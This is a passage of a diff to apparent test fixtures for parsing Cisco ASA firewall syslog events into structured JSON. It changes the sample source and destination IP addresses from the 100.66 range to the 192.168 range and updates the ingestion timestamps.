+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11800 for outside:192.168.14.30/53 (192.168.14.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
  "code": "302015",
  "kind": "event",
  "action": "firewall-rule",
@@ -8002,7 +8002,7 @@
  "destination_interface": "inside",
  "mapped_source_port": 53,
  "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.14.30",
+ "mapped_source_ip": "192.168.14.30",
  "connection_id": "11800",
  "source_interface": "outside",
  "mapped_destination_port": 56132
@@ -8024,8 +8024,8 @@
  },
  "source": {
  "port": 53,
- "address": "100.66.14.30",
- "ip": "100.66.14.30"
+ "address": "192.168.14.30",
+ "ip": "192.168.14.30"
  },
  "tags": [
  "preserve_original_event"
@@ -8060,7 +8060,7 @@
  "localhost"
  ],
  "ip": [
- "100.66.14.30",
+ "192.168.14.30",
  "172.31.98.44"
  ]
  },
@@ -8070,8 +8070,8 @@
  "event": {
  "severity": 6,
  "duration": 0,
- "ingested": "2021-07-19T09:06:25.094930411Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11800 for outside:100.66.14.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 373",
+ "ingested": "2021-12-09T13:32:20.604306300Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11800 for outside:192.168.14.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 373",
  "code": "302016",
  "kind": "event",
  "start": "2018-10-10T12:34:56.000Z",
@@ -8108,8 +8108,8 @@
  },
  "source": {
  "port": 53,
- "address": "100.66.252.210",
- "ip": "100.66.252.210"
+ "address": "192.168.252.210",
+ "ip": "192.168.252.210"
  },
  "tags": [
  "preserve_original_event"
@@ -8144,7 +8144,7 @@
  "localhost"
  ],
  "ip": [
- "100.66.252.210",
+ "192.168.252.210",
  "172.31.98.44"
  ]
  },
@@ -8153,8 +8153,8 @@
  },
  "event": {
  "severity": 6,
- "ingested": "2021-07-19T09:06:25.094932151Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11801 for outside:100.66.252.210/53 (100.66.252.210/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
+ "ingested": "2021-12-09T13:32:20.604310800Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11801 for outside:192.168.252.210/53 (192.168.252.210/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
  "code": "302015",
  "kind": "event",
  "action": "firewall-rule",
@@ -8170,7 +8170,7 @@
  "destination_interface": "inside",
  "mapped_source_port": 53,
  "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.252.210",
+ "mapped_source_ip": "192.168.252.210",
  "connection_id": "11801",
  "source_interface": "outside",
  "mapped_destination_port": 56132
@@ -8192,8 +8192,8 @@
  },
  "source": {
  "port": 53,
- "address": "100.66.252.210",
- "ip": "100.66.252.210"
+ "address": "192.168.252.210",
+ "ip": "192.168.252.210"
  },
  "tags": [
  "preserve_original_event"
@@ -8228,7 +8228,7 @@
  "localhost"
  ],
  "ip": [
- "100.66.252.210",
+ "192.168.252.210",
  "172.31.98.44"
  ]
  },
@@ -8238,8 +8238,8 @@
  "event": {
  "severity": 6,
  "duration": 0,
- "ingested": "2021-07-19T09:06:25.094933951Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11801 for outside:100.66.252.210/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 207",
+ "ingested": "2021-12-09T13:32:20.604315900Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11801 for outside:192.168.252.210/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 207",
  "code": "302016",
  "kind": "event",
  "start": "2018-10-10T12:34:56.000Z",
@@ -8271,8 +8271,8 @@
  },
  "destination": {
  "port": 8280,
- "address": "100.66.98.44",
- "ip": "100.66.98.44"
+ "address": "192.168.98.44",
+ "ip": "192.168.98.44"
  },
  "source": {
  "port": 1276,
@@ -8312,7 +8312,7 @@
  ],
  "ip": [
  "172.31.98.44",
- "100.66.98.44"
+ "192.168.98.44"
  ]
  },
  "host": {
@@ -8320,8 +8320,8 @@
  },
  "event": {
  "severity": 6,
- "ingested": "2021-07-19T09:06:25.094935660Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1276 to outside:100.66.98.44/8280",
+ "ingested": "2021-12-09T13:32:20.604320300Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1276 to outside:192.168.98.44/8280",
  "code": "305011",
  "kind": "event",
  "action": "firewall-rule",
@@ -8354,8 +8354,8 @@
  },
  "source": {
  "port": 80,
- "address": "100.66.98.165",
- "ip": "100.66.98.165"
+ "address": "192.168.98.165",
+ "ip": "192.168.98.165"
  },
  "tags": [
  "preserve_original_event"
@@ -8390,7 +8390,7 @@
  "localhost"
  ],
  "ip": [
- "100.66.98.165",
+ "192.168.98.165",
  "172.31.98.44"
  ]
  },
@@ -8399,8 +8399,8 @@
  },
  "event": {
  "severity": 6,
- "ingested": "2021-07-19T09:06:25.094937440Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11802 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1276 (172.31.98.44/1276)",
+ "ingested": "2021-12-09T13:32:20.604325700Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11802 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1276 (172.31.98.44/1276)",
  "code": "302013",
  "kind": "event",
  "action": "firewall-rule",
@@ -8416,7 +8416,7 @@
  "destination_interface": "inside",
  "mapped_source_port": 80,
  "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.98.165",
+ "mapped_source_ip": "192.168.98.165",
  "connection_id": "11802",
  "source_interface": "outside",
  "mapped_destination_port": 1276
@@ -8433,8 +8433,8 @@
  },
  "destination": {
  "port": 8281,
- "address": "100.66.98.44",
- "ip": "100.66.98.44"
+ "address": "192.168.98.44",
+ "ip": "192.168.98.44"
  },
  "source": {
  "port": 1277,
@@ -8474,7 +8474,7 @@
  ],
  "ip": [
  "172.31.98.44",
- "100.66.98.44"
+ "192.168.98.44"
  ]
  },
  "host": {
@@ -8482,8 +8482,8 @@
  },
  "event": {
  "severity": 6,
- "ingested": "2021-07-19T09:06:25.094939156Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1277 to outside:100.66.98.44/8281",
+ "ingested": "2021-12-09T13:32:20.604331100Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1277 to outside:192.168.98.44/8281",
  "code": "305011",
  "kind": "event",
  "action": "firewall-rule",
@@ -8516,8 +8516,8 @@
  },
  "source": {
  "port": 80,
- "address": "100.66.98.165",
- "ip": "100.66.98.165"
+ "address": "192.168.98.165",
+ "ip": "192.168.98.165"
  },
  "tags": [
  "preserve_original_event"
@@ -8552,7 +8552,7 @@
  "localhost"
  ],
  "ip": [
- "100.66.98.165",
+ "192.168.98.165",
  "172.31.98.44"
  ]
  },
@@ -8561,8 +8561,8 @@
  },
  "event": {
  "severity": 6,
- "ingested": "2021-07-19T09:06:25.094940881Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11803 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1277 (172.31.98.44/1277)",
+ "ingested": "2021-12-09T13:32:20.604336500Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11803 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1277 (172.31.98.44/1277)",
  "code": "302013",
  "kind": "event",
  "action": "firewall-rule",
@@ -8578,7 +8578,7 @@
  "destination_interface": "inside",
  "mapped_source_port": 80,
  "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.98.165",
+ "mapped_source_ip": "192.168.98.165",
  "connection_id": "11803",
  "source_interface": "outside",
  "mapped_destination_port": 1277
@@ -8600,8 +8600,8 @@
  },
  "source": {
  "port": 80,
- "address": "100.66.98.165",
- "ip": "100.66.98.165"
+ "address": "192.168.98.165",
+ "ip": "192.168.98.165"
  },
  "tags": [
  "preserve_original_event"
@@ -8636,7 +8636,7 @@
  "localhost"
  ],
  "ip": [
- "100.66.98.165",
+ "192.168.98.165",
  "172.31.98.44"
  ]
  },
@@ -8647,8 +8647,8 @@
  "severity": 6,
  "duration": 0,
  "reason": "TCP FINs",
- "ingested": "2021-07-19T09:06:25.094942623Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11802 for outside:100.66.98.165/80 to inside:172.31.98.44/1276 duration 0:00:00 bytes 12853 TCP FINs",
+ "ingested": "2021-12-09T13:32:20.604341800Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11802 for outside:192.168.98.165/80 to inside:172.31.98.44/1276 duration 0:00:00 bytes 12853 TCP FINs",
  "code": "302014",
  "kind": "event",
  "start": "2018-10-10T12:34:56.000Z",
@@ -8680,8 +8680,8 @@
  },
  "destination": {
  "port": 8282,
- "address": "100.66.98.44",
- "ip": "100.66.98.44"
+ "address": "192.168.98.44",
+ "ip": "192.168.98.44"
  },
  "source": {
  "port": 1278,
@@ -8721,7 +8721,7 @@
  ],
  "ip": [
  "172.31.98.44",
- "100.66.98.44"
+ "192.168.98.44"
  ]
  },
  "host": {
@@ -8729,8 +8729,8 @@
  },
  "event": {
  "severity": 6,
- "ingested": "2021-07-19T09:06:25.094944348Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1278 to outside:100.66.98.44/8282",
+ "ingested": "2021-12-09T13:32:20.604347600Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1278 to outside:192.168.98.44/8282",
  "code": "305011",
  "kind": "event",
  "action": "firewall-rule",
@@ -8763,8 +8763,8 @@
  },
  "source": {
  "port": 80,
- "address": "100.66.98.165",
- "ip": "100.66.98.165"
+ "address": "192.168.98.165",
+ "ip": "192.168.98.165"
  },
  "tags": [
  "preserve_original_event"
@@ -8799,7 +8799,7 @@
  "localhost"
  ],
  "ip": [
- "100.66.98.165",
+ "192.168.98.165",
  "172.31.98.44"
  ]
  },
@@ -8808,8 +8808,8 @@
  },
  "event": {
  "severity": 6,
- "ingested": "2021-07-19T09:06:25.094946147Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11804 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1278 (172.31.98.44/1278)",
+ "ingested": "2021-12-09T13:32:20.604353Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11804 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1278 (172.31.98.44/1278)",
  "code": "302013",
  "kind": "event",
  "action": "firewall-rule",
@@ -8825,7 +8825,7 @@
  "destination_interface": "inside",
  "mapped_source_port": 80,
  "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.98.165",
+ "mapped_source_ip": "192.168.98.165",
  "connection_id": "11804",
  "source_interface": "outside",
  "mapped_destination_port": 1278
@@ -8847,8 +8847,8 @@
  },
  "source": {
  "port": 80,
- "address": "100.66.98.165",
- "ip": "100.66.98.165"
+ "address": "192.168.98.165",
+ "ip": "192.168.98.165"
  },
  "tags": [
  "preserve_original_event"
@@ -8883,7 +8883,7 @@
  "localhost"
  ],
  "ip": [
- "100.66.98.165",
+ "192.168.98.165",
  "172.31.98.44"
  ]
  },
@@ -8894,8 +8894,8 @@
  "severity": 6,
  "duration": 0,
  "reason": "TCP FINs",
- "ingested": "2021-07-19T09:06:25.094948142Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11803 for outside:100.66.98.165/80 to inside:172.31.98.44/1277 duration 0:00:00 bytes 5291 TCP FINs",
+ "ingested": "2021-12-09T13:32:20.604358700Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11803 for outside:192.168.98.165/80 to inside:172.31.98.44/1277 duration 0:00:00 bytes 5291 TCP FINs",
  "code": "302014",
  "kind": "event",
  "start": "2018-10-10T12:34:56.000Z",
@@ -8927,8 +8927,8 @@
  },
  "destination": {
  "port": 8283,
- "address": "100.66.98.44",
- "ip": "100.66.98.44"
+ "address": "192.168.98.44",
+ "ip": "192.168.98.44"
  },
  "source": {
  "port": 1279,
@@ -8968,7 +8968,7 @@
  ],
  "ip": [
  "172.31.98.44",
- "100.66.98.44"
+ "192.168.98.44"
  ]
  },
  "host": {
@@ -8976,8 +8976,8 @@
  },
  "event": {
  "severity": 6,
- "ingested": "2021-07-19T09:06:25.094949863Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1279 to outside:100.66.98.44/8283",
+ "ingested": "2021-12-09T13:32:20.604364100Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1279 to outside:192.168.98.44/8283",
  "code": "305011",
  "kind": "event",
  "action": "firewall-rule",
@@ -9010,8 +9010,8 @@
  },
  "source": {
  "port": 80,
- "address": "100.66.98.165",
- "ip": "100.66.98.165"
+ "address": "192.168.98.165",
+ "ip": "192.168.98.165"
  },
  "tags": [
  "preserve_original_event"
@@ -9046,7 +9046,7 @@
  "localhost"
  ],
  "ip": [
- "100.66.98.165",
+ "192.168.98.165",
  "172.31.98.44"
  ]
  },
@@ -9055,8 +9055,8 @@
  },
  "event": {
  "severity": 6,
- "ingested": "2021-07-19T09:06:25.094951605Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11805 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1279 (172.31.98.44/1279)",
+ "ingested": "2021-12-09T13:32:20.604369400Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11805 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1279 (172.31.98.44/1279)",
  "code": "302013",
  "kind": "event",
  "action": "firewall-rule",
@@ -9072,7 +9072,7 @@
  "destination_interface": "inside",
  "mapped_source_port": 80,
  "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.98.165",
+ "mapped_source_ip": "192.168.98.165",
  "connection_id": "11805",
  "source_interface": "outside",
  "mapped_destination_port": 1279
@@ -9094,8 +9094,8 @@
  },
  "source": {
  "port": 80,
- "address": "100.66.98.165",
- "ip": "100.66.98.165"
+ "address": "192.168.98.165",
+ "ip": "192.168.98.165"
  },
  "tags": [
  "preserve_original_event"
@@ -9130,7 +9130,7 @@
  "localhost"
  ],
  "ip": [
- "100.66.98.165",
+ "192.168.98.165",
  "172.31.98.44"
  ]
  },
@@ -9141,8 +9141,8 @@
  "severity": 6,
  "duration": 0,
  "reason": "TCP FINs",
- "ingested": "2021-07-19T09:06:25.094953361Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11804 for outside:100.66.98.165/80 to inside:172.31.98.44/1278 duration 0:00:00 bytes 965 TCP FINs",
+ "ingested": "2021-12-09T13:32:20.604374800Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11804 for outside:192.168.98.165/80 to inside:172.31.98.44/1278 duration 0:00:00 bytes 965 TCP FINs",
  "code": "302014",
  "kind": "event",
  "start": "2018-10-10T12:34:56.000Z",
@@ -9179,8 +9179,8 @@
  },
  "source": {
  "port": 80,
- "address": "100.66.98.165",
- "ip": "100.66.98.165"
+ "address": "192.168.98.165",
+ "ip": "192.168.98.165"
  },
  "tags": [
  "preserve_original_event"
@@ -9215,7 +9215,7 @@
  "localhost"
  ],
  "ip": [
- "100.66.98.165",
+ "192.168.98.165",
  "172.31.98.44"
  ]
  },
@@ -9226,8 +9226,8 @@
  "severity": 6,
  "duration": 0,
  "reason": "TCP FINs",
- "ingested": "2021-07-19T09:06:25.094955103Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11805 for outside:100.66.98.165/80 to inside:172.31.98.44/1279 duration 0:00:00 bytes 8605 TCP FINs",
+ "ingested": "2021-12-09T13:32:20.604380200Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11805 for outside:192.168.98.165/80 to inside:172.31.98.44/1279 duration 0:00:00 bytes 8605 TCP FINs",
  "code": "302014",
  "kind": "event",
  "start": "2018-10-10T12:34:56.000Z",
@@ -9259,8 +9259,8 @@
  },
  "destination": {
  "port": 8284,
- "address": "100.66.98.44",
- "ip": "100.66.98.44"
+ "address": "192.168.98.44",
+ "ip": "192.168.98.44"
  },
  "source": {
  "port": 1280,
@@ -9300,7 +9300,7 @@
  ],
  "ip": [
  "172.31.98.44",
- "100.66.98.44"
+ "192.168.98.44"
  ]
  },
  "host": {
@@ -9308,8 +9308,8 @@
  },
  "event": {
  "severity": 6,
- "ingested": "2021-07-19T09:06:25.094957912Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1280 to outside:100.66.98.44/8284",
+ "ingested": "2021-12-09T13:32:20.604385600Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1280 to outside:192.168.98.44/8284",
  "code": "305011",
  "kind": "event",
  "action": "firewall-rule",
@@ -9342,8 +9342,8 @@
  },
  "source": {
  "port": 80,
- "address": "100.66.98.165",
- "ip": "100.66.98.165"
+ "address": "192.168.98.165",
+ "ip": "192.168.98.165"
  },
  "tags": [
  "preserve_original_event"
@@ -9378,7 +9378,7 @@
  "localhost"
  ],
  "ip": [
- "100.66.98.165",
+ "192.168.98.165",
  "172.31.98.44"
  ]
  },
@@ -9387,8 +9387,8 @@
  },
  "event": {
  "severity": 6,
- "ingested": "2021-07-19T09:06:25.094959670Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11806 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1280 (172.31.98.44/1280)",
+ "ingested": "2021-12-09T13:32:20.604390900Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11806 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1280 (172.31.98.44/1280)",
  "code": "302013",
  "kind": "event",
  "action": "firewall-rule",
@@ -9404,7 +9404,7 @@
  "destination_interface": "inside",
  "mapped_source_port": 80,
  "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.98.165",
+ "mapped_source_ip": "192.168.98.165",
  "connection_id": "11806",
  "source_interface": "outside",
  "mapped_destination_port": 1280
@@ -9426,8 +9426,8 @@
  },
  "source": {
  "port": 80,
- "address": "100.66.98.165",
- "ip": "100.66.98.165"
+ "address": "192.168.98.165",
+ "ip": "192.168.98.165"
  },
  "tags": [
  "preserve_original_event"
@@ -9462,7 +9462,7 @@
  "localhost"
  ],
  "ip": [
- "100.66.98.165",
+ "192.168.98.165",
  "172.31.98.44"
  ]
  },
@@ -9473,8 +9473,8 @@
  "severity": 6,
  "duration": 0,
  "reason": "TCP FINs",
- "ingested": "2021-07-19T09:06:25.094961399Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11806 for outside:100.66.98.165/80 to inside:172.31.98.44/1280 duration 0:00:00 bytes 3428 TCP FINs",
+ "ingested": "2021-12-09T13:32:20.604396300Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11806 for outside:192.168.98.165/80 to inside:172.31.98.44/1280 duration 0:00:00 bytes 3428 TCP FINs",
  "code": "302014",
  "kind": "event",
  "start": "2018-10-10T12:34:56.000Z",
@@ -9506,8 +9506,8 @@
  },
  "destination": {
  "port": 8285,
- "address": "100.66.98.44",
- "ip": "100.66.98.44"
+ "address": "192.168.98.44",
+ "ip": "192.168.98.44"
  },
  "source": {
  "port": 1281,
@@ -9547,7 +9547,7 @@
  ],
  "ip": [
  "172.31.98.44",
- "100.66.98.44"
+ "192.168.98.44"
  ]
  },
  "host": {
@@ -9555,8 +9555,8 @@
  },
  "event": {
  "severity": 6,
- "ingested": "2021-07-19T09:06:25.094963132Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1281 to outside:100.66.98.44/8285",
+ "ingested": "2021-12-09T13:32:20.604401900Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1281 to outside:192.168.98.44/8285",
  "code": "305011",
  "kind": "event",
  "action": "firewall-rule",
@@ -9589,8 +9589,8 @@
  },
  "source": {
  "port": 80,
- "address": "100.66.98.165",
- "ip": "100.66.98.165"
+ "address": "192.168.98.165",
+ "ip": "192.168.98.165"
  },
  "tags": [
  "preserve_original_event"
@@ -9625,7 +9625,7 @@
  "localhost"
  ],
  "ip": [
- "100.66.98.165",
+ "192.168.98.165",
  "172.31.98.44"
  ]
  },
@@ -9634,8 +9634,8 @@
  },
  "event": {
  "severity": 6,
- "ingested": "2021-07-19T09:06:25.094964864Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11807 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1281 (172.31.98.44/1281)",
+ "ingested": "2021-12-09T13:32:20.604405700Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11807 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1281 (172.31.98.44/1281)",
  "code": "302013",
  "kind": "event",
  "action": "firewall-rule",
@@ -9651,7 +9651,7 @@
  "destination_interface": "inside",
  "mapped_source_port": 80,
  "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.98.165",
+ "mapped_source_ip": "192.168.98.165",
  "connection_id": "11807",
  "source_interface": "outside",
  "mapped_destination_port": 1281
@@ -9668,8 +9668,8 @@
  },
  "destination": {
  "port": 8286,
- "address": "100.66.98.44",
- "ip": "100.66.98.44"
+ "address": "192.168.98.44",
+ "ip": "192.168.98.44"
  },
  "source": {
  "port": 1282,
@@ -9709,7 +9709,7 @@
  ],
  "ip": [
  "172.31.98.44",
- "100.66.98.44"
+ "192.168.98.44"
  ]
  },
  "host": {
@@ -9717,8 +9717,8 @@
  },
  "event": {
  "severity": 6,
- "ingested": "2021-07-19T09:06:25.094966580Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1282 to outside:100.66.98.44/8286",
+ "ingested": "2021-12-09T13:32:20.604410Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1282 to outside:192.168.98.44/8286",
  "code": "305011",
  "kind": "event",
  "action": "firewall-rule",
@@ -9751,8 +9751,8 @@
  },
  "source": {
  "port": 80,
- "address": "100.66.98.165",
- "ip": "100.66.98.165"
+ "address": "192.168.98.165",
+ "ip": "192.168.98.165"
  },
  "tags": [
  "preserve_original_event"
@@ -9787,7 +9787,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -9796,8 +9796,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094968386Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11808 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1282 (172.31.98.44/1282)", + "ingested": "2021-12-09T13:32:20.604414900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11808 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1282 (172.31.98.44/1282)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -9813,7 +9813,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11808", "source_interface": "outside", "mapped_destination_port": 1282 @@ -9830,8 +9830,8 @@ }, "destination": { "port": 8287, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1283, @@ -9871,7 +9871,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -9879,8 +9879,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094970138Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1283 to outside:100.66.98.44/8287", + "ingested": "2021-12-09T13:32:20.604419500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1283 to outside:192.168.98.44/8287", "code": "305011", "kind": "event", "action": "firewall-rule", 
@@ -9913,8 +9913,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -9949,7 +9949,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -9958,8 +9958,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094971864Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11809 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1283 (172.31.98.44/1283)", + "ingested": "2021-12-09T13:32:20.604423Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11809 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1283 (172.31.98.44/1283)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -9975,7 +9975,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11809", "source_interface": "outside", "mapped_destination_port": 1283 @@ -9992,8 +9992,8 @@ }, "destination": { "port": 8288, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1284, @@ -10033,7 +10033,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { 
@@ -10041,8 +10041,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094973636Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1284 to outside:100.66.98.44/8288", + "ingested": "2021-12-09T13:32:20.604427300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1284 to outside:192.168.98.44/8288", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -10075,8 +10075,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -10111,7 +10111,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -10120,8 +10120,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094975439Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11810 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1284 (172.31.98.44/1284)", + "ingested": "2021-12-09T13:32:20.604432700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11810 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1284 (172.31.98.44/1284)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -10137,7 